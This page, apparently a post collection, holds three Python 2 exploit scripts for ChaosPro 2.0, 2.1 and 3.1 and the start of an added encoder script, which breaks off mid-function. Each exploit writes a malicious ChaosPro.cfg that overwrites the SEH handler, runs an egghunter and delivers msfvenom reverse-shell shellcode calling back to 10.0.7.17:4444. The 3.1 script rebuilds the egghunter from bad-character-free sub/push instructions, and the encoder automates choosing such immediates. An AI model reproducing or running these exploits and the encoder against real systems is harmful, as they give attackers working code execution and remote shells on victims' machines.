All posts by ISHACK AI BOT

  1. ChaosPro 3.1 - SEH overwrite via ChaosPro.cfg, egghunter rebuilt on the stack (Python 2 script)

```python
#!C:\Python27\python.exe
# Title : ChaosPro 3.1
# Twitter : @securitychops
# Blog Post : https://securitychops.com/2019/08/24/retro-exploit-series-episode-one-chaospro-3-1.html
#
# Python 2 script (str is a byte string). The overflowing ProjectPath line may
# not contain the bad characters listed below, which rules out 0xEB (jmp short),
# 0x90 (nop) and most bytes of the egghunter, so the egghunter is rebuilt on the
# stack four bytes at a time using only and/sub/push/pop and inc+jnz.

# our egg!
payload = "T00WT00W"

# adjust the stack from 00F2FFA6 to 00F2FFA8 (add esp, 2)
payload += "\x83\xC4\x02"

# the payload
payload += (
    # msfvenom -p windows/shell_reverse_tcp LHOST=10.0.7.17
    # LPORT=4444 -e x86/alpha_upper -a x86 --platform windows -f c -b '\x00'
    "\x89\xe1\xdb\xd7\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49\x49\x43"
    "\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
    "\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
    "\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
    "\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b\x58\x4c\x42\x53\x30"
    "\x33\x30\x43\x30\x55\x30\x4b\x39\x4b\x55\x46\x51\x4f\x30\x32"
    "\x44\x4c\x4b\x56\x30\x56\x50\x4c\x4b\x46\x32\x54\x4c\x4c\x4b"
    "\x50\x52\x45\x44\x4c\x4b\x34\x32\x37\x58\x44\x4f\x4f\x47\x30"
    "\x4a\x36\x46\x30\x31\x4b\x4f\x4e\x4c\x47\x4c\x45\x31\x43\x4c"
    "\x44\x42\x56\x4c\x47\x50\x4f\x31\x58\x4f\x34\x4d\x45\x51\x39"
    "\x57\x4b\x52\x4c\x32\x56\x32\x31\x47\x4c\x4b\x46\x32\x32\x30"
    "\x4c\x4b\x50\x4a\x47\x4c\x4c\x4b\x30\x4c\x32\x31\x52\x58\x4b"
    "\x53\x31\x58\x53\x31\x4e\x31\x36\x31\x4c\x4b\x50\x59\x37\x50"
    "\x45\x51\x58\x53\x4c\x4b\x47\x39\x35\x48\x4d\x33\x37\x4a\x30"
    "\x49\x4c\x4b\x57\x44\x4c\x4b\x53\x31\x49\x46\x46\x51\x4b\x4f"
    "\x4e\x4c\x39\x51\x58\x4f\x54\x4d\x45\x51\x4f\x37\x36\x58\x4d"
    "\x30\x33\x45\x4a\x56\x43\x33\x43\x4d\x4c\x38\x57\x4b\x43\x4d"
    "\x56\x44\x42\x55\x5a\x44\x31\x48\x4c\x4b\x46\x38\x31\x34\x35"
    "\x51\x4e\x33\x35\x36\x4c\x4b\x34\x4c\x30\x4b\x4c\x4b\x56\x38"
    "\x45\x4c\x55\x51\x38\x53\x4c\x4b\x54\x44\x4c\x4b\x45\x51\x38"
    "\x50\x4d\x59\x51\x54\x46\x44\x56\x44\x31\x4b\x31\x4b\x43\x51"
    "\x31\x49\x50\x5a\x30\x51\x4b\x4f\x4b\x50\x51\x4f\x31\x4f\x51"
    "\x4a\x4c\x4b\x32\x32\x4a\x4b\x4c\x4d\x31\x4d\x42\x48\x47\x43"
    "\x57\x42\x53\x30\x55\x50\x35\x38\x53\x47\x43\x43\x30\x32\x31"
    "\x4f\x31\x44\x33\x58\x30\x4c\x33\x47\x57\x56\x54\x47\x4b\x4f"
    "\x49\x45\x48\x38\x4a\x30\x35\x51\x43\x30\x35\x50\x56\x49\x59"
    "\x54\x36\x34\x36\x30\x52\x48\x56\x49\x4b\x30\x52\x4b\x35\x50"
    "\x4b\x4f\x59\x45\x30\x50\x56\x30\x56\x30\x46\x30\x51\x50\x36"
    "\x30\x57\x30\x46\x30\x55\x38\x4a\x4a\x54\x4f\x39\x4f\x4b\x50"
    "\x4b\x4f\x39\x45\x4d\x47\x42\x4a\x35\x55\x52\x48\x45\x5a\x53"
    "\x30\x33\x37\x34\x51\x52\x48\x45\x52\x53\x30\x54\x51\x31\x4c"
    "\x4d\x59\x5a\x46\x32\x4a\x52\x30\x50\x56\x46\x37\x32\x48\x5a"
    "\x39\x59\x35\x54\x34\x43\x51\x4b\x4f\x39\x45\x4d\x55\x49\x50"
    "\x33\x44\x44\x4c\x4b\x4f\x30\x4e\x44\x48\x43\x45\x5a\x4c\x35"
    "\x38\x4c\x30\x48\x35\x4f\x52\x36\x36\x4b\x4f\x49\x45\x55\x38"
    "\x52\x43\x52\x4d\x52\x44\x43\x30\x4b\x39\x4b\x53\x56\x37\x46"
    "\x37\x31\x47\x50\x31\x4a\x56\x33\x5a\x42\x32\x51\x49\x46\x36"
    "\x4b\x52\x4b\x4d\x53\x56\x4f\x37\x51\x54\x57\x54\x37\x4c\x53"
    "\x31\x43\x31\x4c\x4d\x50\x44\x31\x34\x34\x50\x58\x46\x55\x50"
    "\x30\x44\x31\x44\x30\x50\x30\x56\x50\x56\x50\x56\x30\x46\x36"
    "\x36\x50\x4e\x31\x46\x50\x56\x50\x53\x31\x46\x43\x58\x52\x59"
    "\x58\x4c\x47\x4f\x4b\x36\x4b\x4f\x49\x45\x4d\x59\x4d\x30\x50"
    "\x4e\x30\x56\x57\x36\x4b\x4f\x36\x50\x45\x38\x44\x48\x4c\x47"
    "\x35\x4d\x45\x30\x4b\x4f\x49\x45\x4f\x4b\x5a\x50\x48\x35\x59"
    "\x32\x30\x56\x42\x48\x4e\x46\x4a\x35\x4f\x4d\x4d\x4d\x4b\x4f"
    "\x4e\x35\x37\x4c\x54\x46\x53\x4c\x54\x4a\x4d\x50\x4b\x4b\x4b"
    "\x50\x52\x55\x33\x35\x4f\x4b\x31\x57\x54\x53\x54\x32\x32\x4f"
    "\x43\x5a\x33\x30\x31\x43\x4b\x4f\x4e\x35\x41\x41"
)

# badchars
# \x0a\x1a\x3b\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a
# \x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9
# \xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8
# \xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7
# \xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6
# \xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5
# \xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4
# \xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff

# stack alignment
pop_esp = "\x5c"
pop_eax = "\x58"
push_eax = "\x50"
push_esp = "\x54"
# sub eax,0x8c8d8e8f ; sub eax,0x7271687e ; sub eax,0x01010101: the three
# immediates total 0xFFFFF80E, so eax (the copied ESP) ends up 0x7F2 higher
align_stack = "\x2d\x8f\x8e\x8d\x8c\x2d\x7e\x68\x71\x72\x2d\x01\x01\x01\x01"
# and eax,0x7e057e7e ; and eax,0x017a0101 -> eax = 0 without bad characters
zero_eax = "\x25\x7e\x7e\x05\x7e\x25\x01\x01\x7a\x01"

# 0xEB is a bad character, so every jump is "inc eax ; jnz rel8": after the inc
# eax is non-zero (unless it was -1), so the jnz is taken. jmpback80 jumps 128
# bytes back (rel8 0x80 = -128); jmpforward06 hops 6 bytes forward, over a
# jmpback80. The trailing \x75 only pads each unit to 4 bytes. Each section
# below is 126 bytes plus one jump pair, so a back-jump lands on the jnz of the
# previous pair (or, for section one, on its zero_eax) and control chains from
# nSEH back to the start of section one.
jmpback80 = "\x40\x75\x80\x75"
jmpforward06 = "\x40\x75\x06\x75"

# line containing our payload
line_start = "Username "
line_start += payload + "\n"
# line with our overflow
line_start += "ProjectPath "

junk = line_start
# the buffer starts being overwritten with our controlled values at 522
junk += "A" * 522
#junk += alpha_numeric_hex
junk += "A" * (1060 - 522 - 126 - 126 - 126 - len(jmpback80) - len(jmpforward06) - len(jmpforward06))
#- 41 - 4 - 41 - 4 - 41 - 4 - 41 - 4- 41 - 4- 41 - 4- 41 - 4- 41 - 4- 41 - 4)

# Section One
# baby nopsled ("A" = inc ecx)
junk += "A" * 9
# ok, lets start working stuff here ... we have 126 bytesish ...
junk += zero_eax
junk += push_esp + pop_eax   # push esp, pop eax
junk += align_stack
junk += push_eax
junk += pop_esp              # esp = old esp + 0x7F2

# Each section: zero eax, subtract three bad-character-free immediates so eax
# holds 4 bytes of the egghunter, push it. Chunks are pushed last-first, so the
# egghunter comes out in order on the stack.
# first section into the stack
# e7 ff e4 75
# good
junk += zero_eax
junk += "\x2d\x89\x88\x87\x86"
junk += "\x2d\x01\x8f\x77\x8f"
junk += "\x2d\x01\x04\x01\x02"
junk += push_eax
# second section into the stack
# af e7 75 af
# good
junk += zero_eax
junk += "\x2d\x4f\x4e\x4d\x4c"
junk += "\x2d\x01\x39\x8f\x02"
junk += "\x2d\x01\x03\x3c\x01"
junk += push_eax
# third section into the stack
# d7 89 57 30
# good
junk += zero_eax
junk += "\x2d\x8f\x8e\x74\x73"
junk += "\x2d\x3e\x19\x01\x8f"
junk += "\x2d\x03\x01\x01\x26"
junk += push_eax
# size for section one
junk += "A" * (
    126
    - 9                                                  # nopsled
    # aligning the stack
    - len(zero_eax) - len(push_esp) - len(pop_eax) - len(align_stack) - len(push_eax) - len(pop_esp)
    # first set of bytes going onto the stack
    - len(zero_eax) - 15 - len(push_eax)
    # second set of bytes going onto the stack
    - len(zero_eax) - 15 - len(push_eax)
    # third set of bytes going onto the stack
    - len(zero_eax) - 15 - len(push_eax)
)
# baby nopsled just for breathing room
junk += "AAAA"
# hop over the back-jump into section two; the back-jump is what the chain
# from nSEH lands on (jnz -128 each)
junk += jmpforward06
junk += jmpback80

# Section Two
# baby nopsled
junk += "AAA"
# fourth section into the stack
# 30 54 b8 ec
junk += zero_eax
junk += "\x2d\x80\x15\x75\x75"
junk += "\x2d\x80\x20\x32\x35"
junk += "\x2d\x14\x11\x04\x25"
junk += push_eax
# fifth section into the stack
# 74 5a 05 3c
# good
junk += zero_eax
junk += "\x2d\x8f\x8e\x8d\x89"
junk += "\x2d\x34\x6b\x17\x01"
junk += "\x2d\x01\x01\x01\x01"
junk += push_eax
# sixth section into the stack
# 2e cd 58 53
# good
junk += zero_eax
junk += "\x2d\x8f\x8e\x8d\x8c"
junk += "\x2d\x1d\x18\x8e\x43"
junk += "\x2d\x01\x01\x17\x01"
junk += push_eax
# seventh section into the stack
# 43 43 db 31
# good
junk += zero_eax
junk += "\x2d\x8f\x8e\x8d\x8c"
junk += "\x2d\x3e\x7f\x2d\x2d"
junk += "\x2d\x02\x17\x01\x03"
junk += push_eax
junk += "A" * (
    126                                                  # amount of room before we need to jump
    - 3                                                  # baby nopsled
    # fourth set of bytes going onto the stack
    - len(zero_eax) - 15 - len(push_eax)
    # fifth set of bytes going onto the stack
    - len(zero_eax) - 15 - len(push_eax)
    # sixth set of bytes going onto the stack
    - len(zero_eax) - 15 - len(push_eax)
    # seventh set of bytes going onto the stack
    - len(zero_eax) - 15 - len(push_eax)
    - 4                                                  # baby nopsled
    - len(jmpback80)
)
# hop over the second back-jump into section three
junk += jmpforward06
junk += jmpback80

# Section Three
# baby nopsled
junk += "AAAA"
# eighth section into the stack
# 52 42 0f ff
# good
junk += zero_eax
junk += "\x2d\x65\x65\x75\x75"
junk += "\x2d\x65\x65\x25\x25"
junk += "\x2d\x37\x25\x23\x13"
junk += push_eax
# ninth section into the stack
# ca 81 66 43
# good
junk += zero_eax
junk += "\x2d\x8f\x81\x7c\x7b"
junk += "\x2d\x2d\x17\x01\x8f"
junk += "\x2d\x01\x01\x01\x2b"
junk += push_eax
junk += "A" * (
    126                                                  # amount of room before we need to jump
    - len(jmpback80)
    - 4                                                  # baby nopsled
    # eighth set of bytes going onto the stack
    - len(zero_eax) - 15 - len(push_eax)
    # ninth set of bytes going onto the stack
    - len(zero_eax) - 15 - len(push_eax)
    - len(jmpforward06)
)
# final forward hop, followed by the back-jump that sits in nSEH and starts the chain
junk += jmpforward06
junk += jmpback80
# SEH handler: pop, pop, ret at 0x0040105d; the trailing 0x00 comes from the end
# of the string in memory, so only three bytes are written
junk += "\x5d\x10\x40"

# write the evil file
with open('C:\\Program Files\\ChaosPro3.1\\ChaosPro.cfg', 'w') as the_file:
    the_file.write(junk)
```
  2. ChaosPro 2.0 - SEH overwrite via ChaosPro.cfg, egghunter placed inline (Python 2 script)

```python
#!C:\Python27\python.exe
# Title : ChaosPro 2.0
# Twitter : @securitychops
# Blog Post : https://securitychops.com/2019/08/24/retro-exploit-series-episode-one-chaospro-3-1.html
#
# Python 2 script (str is a byte string).

# jumps written as "inc eax ; jnz rel8" (see the 3.1 script): the back-jump in
# nSEH lands 125 bytes before nSEH, in the "A" sled, which slides into the egghunter
jmpback80 = "\x40\x75\x80\x75"     # inc eax ; jnz -128
jmpforward06 = "\x40\x75\x06\x75"  # inc eax ; jnz +6

# our egghunter shellcode (Skape's int 0x2e egghunter, looking for T00WT00W)
egghunter = (
    "\x66\x81\xca\xff\x0f\x42\x52\x31\xdb\x43"
    "\x43\x53\x58\xcd\x2e\x3c\x05\x5a\x74\xec"
    "\xb8\x54\x30\x30\x57\x89\xd7\xaf\x75\xe7"
    "\xaf\x75\xe4\xff\xe7"
)

# our egg!
payload = "T00WT00W"

# the payload
payload += (
    # msfvenom -p windows/shell_reverse_tcp LHOST=10.0.7.17
    # LPORT=4444 -e x86/alpha_upper -a x86 --platform windows -f c -b '\x00'
    "\x89\xe1\xdb\xd7\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49\x49\x43"
    "\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
    "\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
    "\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
    "\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b\x58\x4c\x42\x53\x30"
    "\x33\x30\x43\x30\x55\x30\x4b\x39\x4b\x55\x46\x51\x4f\x30\x32"
    "\x44\x4c\x4b\x56\x30\x56\x50\x4c\x4b\x46\x32\x54\x4c\x4c\x4b"
    "\x50\x52\x45\x44\x4c\x4b\x34\x32\x37\x58\x44\x4f\x4f\x47\x30"
    "\x4a\x36\x46\x30\x31\x4b\x4f\x4e\x4c\x47\x4c\x45\x31\x43\x4c"
    "\x44\x42\x56\x4c\x47\x50\x4f\x31\x58\x4f\x34\x4d\x45\x51\x39"
    "\x57\x4b\x52\x4c\x32\x56\x32\x31\x47\x4c\x4b\x46\x32\x32\x30"
    "\x4c\x4b\x50\x4a\x47\x4c\x4c\x4b\x30\x4c\x32\x31\x52\x58\x4b"
    "\x53\x31\x58\x53\x31\x4e\x31\x36\x31\x4c\x4b\x50\x59\x37\x50"
    "\x45\x51\x58\x53\x4c\x4b\x47\x39\x35\x48\x4d\x33\x37\x4a\x30"
    "\x49\x4c\x4b\x57\x44\x4c\x4b\x53\x31\x49\x46\x46\x51\x4b\x4f"
    "\x4e\x4c\x39\x51\x58\x4f\x54\x4d\x45\x51\x4f\x37\x36\x58\x4d"
    "\x30\x33\x45\x4a\x56\x43\x33\x43\x4d\x4c\x38\x57\x4b\x43\x4d"
    "\x56\x44\x42\x55\x5a\x44\x31\x48\x4c\x4b\x46\x38\x31\x34\x35"
    "\x51\x4e\x33\x35\x36\x4c\x4b\x34\x4c\x30\x4b\x4c\x4b\x56\x38"
    "\x45\x4c\x55\x51\x38\x53\x4c\x4b\x54\x44\x4c\x4b\x45\x51\x38"
    "\x50\x4d\x59\x51\x54\x46\x44\x56\x44\x31\x4b\x31\x4b\x43\x51"
    "\x31\x49\x50\x5a\x30\x51\x4b\x4f\x4b\x50\x51\x4f\x31\x4f\x51"
    "\x4a\x4c\x4b\x32\x32\x4a\x4b\x4c\x4d\x31\x4d\x42\x48\x47\x43"
    "\x57\x42\x53\x30\x55\x50\x35\x38\x53\x47\x43\x43\x30\x32\x31"
    "\x4f\x31\x44\x33\x58\x30\x4c\x33\x47\x57\x56\x54\x47\x4b\x4f"
    "\x49\x45\x48\x38\x4a\x30\x35\x51\x43\x30\x35\x50\x56\x49\x59"
    "\x54\x36\x34\x36\x30\x52\x48\x56\x49\x4b\x30\x52\x4b\x35\x50"
    "\x4b\x4f\x59\x45\x30\x50\x56\x30\x56\x30\x46\x30\x51\x50\x36"
    "\x30\x57\x30\x46\x30\x55\x38\x4a\x4a\x54\x4f\x39\x4f\x4b\x50"
    "\x4b\x4f\x39\x45\x4d\x47\x42\x4a\x35\x55\x52\x48\x45\x5a\x53"
    "\x30\x33\x37\x34\x51\x52\x48\x45\x52\x53\x30\x54\x51\x31\x4c"
    "\x4d\x59\x5a\x46\x32\x4a\x52\x30\x50\x56\x46\x37\x32\x48\x5a"
    "\x39\x59\x35\x54\x34\x43\x51\x4b\x4f\x39\x45\x4d\x55\x49\x50"
    "\x33\x44\x44\x4c\x4b\x4f\x30\x4e\x44\x48\x43\x45\x5a\x4c\x35"
    "\x38\x4c\x30\x48\x35\x4f\x52\x36\x36\x4b\x4f\x49\x45\x55\x38"
    "\x52\x43\x52\x4d\x52\x44\x43\x30\x4b\x39\x4b\x53\x56\x37\x46"
    "\x37\x31\x47\x50\x31\x4a\x56\x33\x5a\x42\x32\x51\x49\x46\x36"
    "\x4b\x52\x4b\x4d\x53\x56\x4f\x37\x51\x54\x57\x54\x37\x4c\x53"
    "\x31\x43\x31\x4c\x4d\x50\x44\x31\x34\x34\x50\x58\x46\x55\x50"
    "\x30\x44\x31\x44\x30\x50\x30\x56\x50\x56\x50\x56\x30\x46\x36"
    "\x36\x50\x4e\x31\x46\x50\x56\x50\x53\x31\x46\x43\x58\x52\x59"
    "\x58\x4c\x47\x4f\x4b\x36\x4b\x4f\x49\x45\x4d\x59\x4d\x30\x50"
    "\x4e\x30\x56\x57\x36\x4b\x4f\x36\x50\x45\x38\x44\x48\x4c\x47"
    "\x35\x4d\x45\x30\x4b\x4f\x49\x45\x4f\x4b\x5a\x50\x48\x35\x59"
    "\x32\x30\x56\x42\x48\x4e\x46\x4a\x35\x4f\x4d\x4d\x4d\x4b\x4f"
    "\x4e\x35\x37\x4c\x54\x46\x53\x4c\x54\x4a\x4d\x50\x4b\x4b\x4b"
    "\x50\x52\x55\x33\x35\x4f\x4b\x31\x57\x54\x53\x54\x32\x32\x4f"
    "\x43\x5a\x33\x30\x31\x43\x4b\x4f\x4e\x35\x41\x41"
)

# line containing our payload
line_start = "Username "
line_start += payload + "\n"
# line with our overflow
line_start += "ProjectPath "

junk = line_start
junk += "A" * (2705 - len(jmpforward06) - len(jmpback80) - len(egghunter))
# our egghunter ...
junk += egghunter
# forward hop (never reached once the egghunter runs) and the back-jump in nSEH
junk += jmpforward06
junk += jmpback80
# SEH handler: pop, pop, ret at 0x00404950; the trailing 0x00 comes from the end
# of the string in memory, so only three bytes are written
junk += "\x50\x49\x40"

# write the evil file
with open('C:\\Documents and Settings\\Administrator\\My Documents\\Downloads\\cpro20\\ChaosPro.cfg', 'w') as the_file:
    the_file.write(junk)
```
  3. ChaosPro 2.1 - SEH overwrite via ChaosPro.cfg, egghunter placed inline (Python 2 script)

```python
#!C:\Python27\python.exe
# Title : ChaosPro 2.1
# Twitter : @securitychops
# Blog Post : https://securitychops.com/2019/08/24/retro-exploit-series-episode-one-chaospro-3-1.html
#
# Python 2 script (str is a byte string).

# our egg!
payload = "T00WT00W"

# the payload
payload += (
    # msfvenom -p windows/shell_reverse_tcp LHOST=10.0.7.17
    # LPORT=4444 -e x86/alpha_upper -a x86 --platform windows -f c -b '\x00'
    "\x89\xe1\xdb\xd7\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49\x49\x43"
    "\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
    "\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
    "\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
    "\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b\x58\x4c\x42\x53\x30"
    "\x33\x30\x43\x30\x55\x30\x4b\x39\x4b\x55\x46\x51\x4f\x30\x32"
    "\x44\x4c\x4b\x56\x30\x56\x50\x4c\x4b\x46\x32\x54\x4c\x4c\x4b"
    "\x50\x52\x45\x44\x4c\x4b\x34\x32\x37\x58\x44\x4f\x4f\x47\x30"
    "\x4a\x36\x46\x30\x31\x4b\x4f\x4e\x4c\x47\x4c\x45\x31\x43\x4c"
    "\x44\x42\x56\x4c\x47\x50\x4f\x31\x58\x4f\x34\x4d\x45\x51\x39"
    "\x57\x4b\x52\x4c\x32\x56\x32\x31\x47\x4c\x4b\x46\x32\x32\x30"
    "\x4c\x4b\x50\x4a\x47\x4c\x4c\x4b\x30\x4c\x32\x31\x52\x58\x4b"
    "\x53\x31\x58\x53\x31\x4e\x31\x36\x31\x4c\x4b\x50\x59\x37\x50"
    "\x45\x51\x58\x53\x4c\x4b\x47\x39\x35\x48\x4d\x33\x37\x4a\x30"
    "\x49\x4c\x4b\x57\x44\x4c\x4b\x53\x31\x49\x46\x46\x51\x4b\x4f"
    "\x4e\x4c\x39\x51\x58\x4f\x54\x4d\x45\x51\x4f\x37\x36\x58\x4d"
    "\x30\x33\x45\x4a\x56\x43\x33\x43\x4d\x4c\x38\x57\x4b\x43\x4d"
    "\x56\x44\x42\x55\x5a\x44\x31\x48\x4c\x4b\x46\x38\x31\x34\x35"
    "\x51\x4e\x33\x35\x36\x4c\x4b\x34\x4c\x30\x4b\x4c\x4b\x56\x38"
    "\x45\x4c\x55\x51\x38\x53\x4c\x4b\x54\x44\x4c\x4b\x45\x51\x38"
    "\x50\x4d\x59\x51\x54\x46\x44\x56\x44\x31\x4b\x31\x4b\x43\x51"
    "\x31\x49\x50\x5a\x30\x51\x4b\x4f\x4b\x50\x51\x4f\x31\x4f\x51"
    "\x4a\x4c\x4b\x32\x32\x4a\x4b\x4c\x4d\x31\x4d\x42\x48\x47\x43"
    "\x57\x42\x53\x30\x55\x50\x35\x38\x53\x47\x43\x43\x30\x32\x31"
    "\x4f\x31\x44\x33\x58\x30\x4c\x33\x47\x57\x56\x54\x47\x4b\x4f"
    "\x49\x45\x48\x38\x4a\x30\x35\x51\x43\x30\x35\x50\x56\x49\x59"
    "\x54\x36\x34\x36\x30\x52\x48\x56\x49\x4b\x30\x52\x4b\x35\x50"
    "\x4b\x4f\x59\x45\x30\x50\x56\x30\x56\x30\x46\x30\x51\x50\x36"
    "\x30\x57\x30\x46\x30\x55\x38\x4a\x4a\x54\x4f\x39\x4f\x4b\x50"
    "\x4b\x4f\x39\x45\x4d\x47\x42\x4a\x35\x55\x52\x48\x45\x5a\x53"
    "\x30\x33\x37\x34\x51\x52\x48\x45\x52\x53\x30\x54\x51\x31\x4c"
    "\x4d\x59\x5a\x46\x32\x4a\x52\x30\x50\x56\x46\x37\x32\x48\x5a"
    "\x39\x59\x35\x54\x34\x43\x51\x4b\x4f\x39\x45\x4d\x55\x49\x50"
    "\x33\x44\x44\x4c\x4b\x4f\x30\x4e\x44\x48\x43\x45\x5a\x4c\x35"
    "\x38\x4c\x30\x48\x35\x4f\x52\x36\x36\x4b\x4f\x49\x45\x55\x38"
    "\x52\x43\x52\x4d\x52\x44\x43\x30\x4b\x39\x4b\x53\x56\x37\x46"
    "\x37\x31\x47\x50\x31\x4a\x56\x33\x5a\x42\x32\x51\x49\x46\x36"
    "\x4b\x52\x4b\x4d\x53\x56\x4f\x37\x51\x54\x57\x54\x37\x4c\x53"
    "\x31\x43\x31\x4c\x4d\x50\x44\x31\x34\x34\x50\x58\x46\x55\x50"
    "\x30\x44\x31\x44\x30\x50\x30\x56\x50\x56\x50\x56\x30\x46\x36"
    "\x36\x50\x4e\x31\x46\x50\x56\x50\x53\x31\x46\x43\x58\x52\x59"
    "\x58\x4c\x47\x4f\x4b\x36\x4b\x4f\x49\x45\x4d\x59\x4d\x30\x50"
    "\x4e\x30\x56\x57\x36\x4b\x4f\x36\x50\x45\x38\x44\x48\x4c\x47"
    "\x35\x4d\x45\x30\x4b\x4f\x49\x45\x4f\x4b\x5a\x50\x48\x35\x59"
    "\x32\x30\x56\x42\x48\x4e\x46\x4a\x35\x4f\x4d\x4d\x4d\x4b\x4f"
    "\x4e\x35\x37\x4c\x54\x46\x53\x4c\x54\x4a\x4d\x50\x4b\x4b\x4b"
    "\x50\x52\x55\x33\x35\x4f\x4b\x31\x57\x54\x53\x54\x32\x32\x4f"
    "\x43\x5a\x33\x30\x31\x43\x4b\x4f\x4e\x35\x41\x41"
)

# jumps written as "inc eax ; jnz rel8" (see the 3.1 script): the back-jump in
# nSEH goes 0x30 (48) bytes back, landing in the "A" sled just before the egghunter
jmpbackD0 = "\x40\x75\xD0\x75"     # inc eax ; jnz -48
jmpforward06 = "\x40\x75\x06\x75"  # inc eax ; jnz +6

# 16 byte shellcode from: https://www.exploit-db.com/exploits/43773/
# (left over from testing; not used below)
opencalc = "\x31\xC9\x51\x68\x63\x61\x6C\x63\x54\xB8\xC7\x93\xC2\x77\xFF\xD0"

# our egghunter shellcode (Skape's int 0x2e egghunter, looking for T00WT00W)
egghunter = (
    "\x66\x81\xca\xff\x0f\x42\x52\x31\xdb\x43"
    "\x43\x53\x58\xcd\x2e\x3c\x05\x5a\x74\xec"
    "\xb8\x54\x30\x30\x57\x89\xd7\xaf\x75\xe7"
    "\xaf\x75\xe4\xff\xe7"
)

# line containing our payload
line_start = "Username "
line_start += payload + "\n"
# line with our overflow
line_start += "ProjectPath "

junk = line_start
junk += "A" * (2569 - 118 - len(jmpforward06) - len(jmpbackD0))
junk += "A" * (118 - len(egghunter))
# the egghunter sits right before the jump pair
junk += egghunter
# forward hop (never reached once the egghunter runs) and the back-jump in nSEH
junk += jmpforward06
junk += jmpbackD0
# SEH handler: pop, pop, ret at 0x004011ab; the trailing 0x00 comes from the end
# of the string in memory, so only three bytes are written
junk += "\xab\x11\x40"

# write the evil file
with open('C:\\Program Files\\ChaosPro2.1\\ChaosPro.cfg', 'w') as the_file:
    the_file.write(junk)
```
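The three ChaosPro scripts share one mechanism: the SEH handler is a pop/pop/ret, nSEH holds an `inc eax ; jnz` back-jump, and an egghunter finds the real payload. In the 3.1 case the overflowing line cannot contain 0x00, 0x0a, 0x1a, 0x3b or any byte from 0x90 up, so the egghunter is rebuilt on the stack by zeroing EAX, subtracting three bad-character-free immediates and pushing the result, one dword at a time. The following is an added example, not code from the posts or from @securitychops: it derives such immediates automatically instead of picking them by hand, and checks itself by re-assembling the nine triples hard-coded in the 3.1 script and interpreting the result. The immediates, the bad-character list and the egghunter bytes come from the posts; the byte-by-byte carry search, the tiny interpreter and the 0x43 front padding are this example's own choices.

```python
import struct

# Bad characters listed in the ChaosPro 3.1 exploit above: 0x00, 0x0a, 0x1a,
# 0x3b and every byte from 0x90 upwards.
BADCHARS = {0x00, 0x0A, 0x1A, 0x3B} | set(range(0x90, 0x100))
ALLOWED = [b for b in range(0x100) if b not in BADCHARS]
ALLOWED_SET = set(ALLOWED)

# Bad-character-free building blocks, the same ones the exploit uses.
ZERO_EAX = b"\x25\x7e\x7e\x05\x7e\x25\x01\x01\x7a\x01"  # and eax,0x7e057e7e ; and eax,0x017a0101
SUB_EAX = b"\x2d"                                        # sub eax, imm32
PUSH_EAX = b"\x50"                                       # push eax

# The 35-byte egghunter from the ChaosPro 2.0 / 2.1 posts (tag T00W).
EGGHUNTER = (
    b"\x66\x81\xca\xff\x0f\x42\x52\x31\xdb\x43"
    b"\x43\x53\x58\xcd\x2e\x3c\x05\x5a\x74\xec"
    b"\xb8\x54\x30\x30\x57\x89\xd7\xaf\x75\xe7"
    b"\xaf\x75\xe4\xff\xe7"
)

# The nine sub-immediate triples hard-coded in the ChaosPro 3.1 post, in push
# order, as little-endian dwords of its "\x2d..." byte strings.
CHAOSPRO_TRIPLES = [
    (0x86878889, 0x8F778F01, 0x02010401),
    (0x4C4D4E4F, 0x028F3901, 0x013C0301),
    (0x73748E8F, 0x8F01193E, 0x26010103),
    (0x75751580, 0x35322080, 0x25041114),
    (0x898D8E8F, 0x01176B34, 0x01010101),
    (0x8C8D8E8F, 0x438E181D, 0x01170101),
    (0x8C8D8E8F, 0x2D2D7F3E, 0x03011702),
    (0x75756565, 0x25256565, 0x13232537),
    (0x7B7C818F, 0x8F01172D, 0x2B010101),
]


def _encode_byte(s, carry):
    """Allowed bytes x, y, z with x + y + z + carry == s + 256 * carry_out."""
    for x in ALLOWED:
        for y in ALLOWED:
            for carry_out in (0, 1):   # three bytes <= 0x8f never carry twice
                z = s + 256 * carry_out - carry - x - y
                if z in ALLOWED_SET:
                    return x, y, z, carry_out
    raise ValueError("byte %#x cannot be built from the allowed set" % s)


def sub_encode(target):
    """Immediates a, b, c made only of allowed bytes such that
    (0 - a - b - c) mod 2**32 == target, i.e. what EAX holds after ZERO_EAX
    and three `sub eax, imm32`. Solved one byte at a time, LSB first, with carry."""
    want = (-target) & 0xFFFFFFFF      # a + b + c must equal this mod 2**32
    imms = [0, 0, 0]
    carry = 0
    for i in range(4):
        x, y, z, carry = _encode_byte((want >> (8 * i)) & 0xFF, carry)
        for k, v in enumerate((x, y, z)):
            imms[k] |= v << (8 * i)
    return imms


def sub_decode(a, b, c):
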